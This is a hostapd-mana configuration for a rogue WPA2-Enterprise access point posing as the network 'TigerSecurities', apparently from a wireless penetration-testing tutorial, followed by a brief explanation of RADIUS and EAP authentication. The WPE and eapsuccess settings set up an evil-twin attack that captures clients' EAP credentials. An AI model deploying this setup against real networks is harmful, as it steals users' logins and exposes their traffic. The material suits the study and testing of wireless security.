# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g
# --------------------
# WPA configuration
# --------------------
wpa=2 # use WPA2 version
wpa_key_mgmt=WPA-EAP # use external authentication server
wpa_pairwise=TKIP CCMP # pairwise encryption to use
# --------------------------
# EAP server configuration
# --------------------------
ieee8021x=1 # requires 802.1x authentication server
eapol_key_index_workaround=0 # EAPOL key index fix for WinXP supplicant (disabled here)
eap_server=1 # enable integrated EAP server instead of RADIUS
eap_user_file=fakenet.eap_user # filename containing information of users
# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key # private key for the server certificate
private_key_passwd= # password used to encrypt the private key (empty here)
dh_file=/root/certs/dhparam.pem # file path to DH/DSA parameters file (in PEM format)
# -----------------------------
# mana specific configuration
# -----------------------------
mana_wpe=1 # enable WPE mode to intercept various EAP credentials
mana_eapsuccess=1 # return EAP success to the clients, and have them connect
Authentication is done using a Remote Authentication Dial-In User Service (RADIUS) server. The client authenticates using a number of EAP frames, depending on the agreed upon authentication scheme, which are relayed by the AP to the RADIUS server. If authentication is successful, the result is then used as Pairwise Master Key (PMK) for the 4-way handshake, as opposed to PSK, where the passphrase is derived to generate the PMK.
